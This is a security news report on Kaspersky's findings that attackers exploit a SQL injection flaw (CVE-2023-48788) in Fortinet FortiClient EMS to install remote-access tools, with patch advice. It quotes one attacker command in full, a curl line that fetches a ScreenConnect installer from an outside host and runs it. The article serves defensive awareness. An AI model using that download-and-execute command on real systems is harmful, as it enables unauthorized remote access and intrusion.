InfoSecBulletin Cybersecurity for mankind
Kaspersky’s Global Emergency Response Team (GERT) found that attackers are exploiting a patched SQL injection vulnerability (CVE-2023-48788) in Fortinet FortiClient EMS, affecting versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. Even with available patches, many systems remain unupdated, allowing unauthorized code execution and compromise of networks.
According to the report, The vulnerability comes from inadequate filtering of SQL input. An attacker can send crafted packets to execute unauthorized commands. It’s especially risky on Windows servers exposed to the internet, as these systems often handle vital functions like secure VPN access for employees.
Eight New ICS Advisories released by CISA
Authority Denies
Hacker claim ransomware attack on Indonesia’s state bank BRI
London-based company “Builder.ai” reportedly exposed 1.2 TB data
(CVE-2024-12727, CVE-2024-12728, CVE-2024-12729)
Sophos resolved 3 critical vulnerabilities in Firewall
“Workshop on Cybersecurity Awareness and Needs Analysis” held at BBTA
CVE-2023-48788
Kaspersky reveals active exploitation of Fortinet Vulnerability
U.S. Weighs Ban on Chinese-Made Router TP-Link: WSJ reports
Daily Security Update Dated: 18.12.2024
CISA released best practices to secure Microsoft 365 Cloud environments
Data breach! Ireland fines Meta $264 million, Australia $50m
The attack usually starts by exploiting a vulnerability to install remote monitoring tools like AnyDesk and ScreenConnect. This gives attackers a way to access the network and carry out actions like stealing credentials, moving laterally, and avoiding detection.
In October 2024, GERT analysts discovered a vulnerability being exploited when telemetry alerts showed unauthorized access to registry hives through an admin account on a compromised Windows server. Investigations found that attackers used Base64-encoded payloads and tools like curl and certutil to download malicious installers.
One significant command found in the attackers’ scripts was:
curl -o C:\update.exe “https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe” & start /B C:\update.exe & start /B C:\update.exe
The attackers showed adaptability by targeting various organizations, mainly in South America, and used platforms like webhook.site to collect data from vulnerable systems.
Key artifacts identified during the investigation included:
- Connections to external servers traced to IP addresses associated with previous malicious campaigns.
- Evidence of credential harvesting tools, such as mimikatz.exe and webbrowserpassview.exe.
- Suspicious entries in ems.log and sql_trace.log, pointing to SQL injection attempts.
GERT’s findings highlight the need to update FortiClient EMS to versions 7.0.11–7.0.13 or 7.2.3 and later.
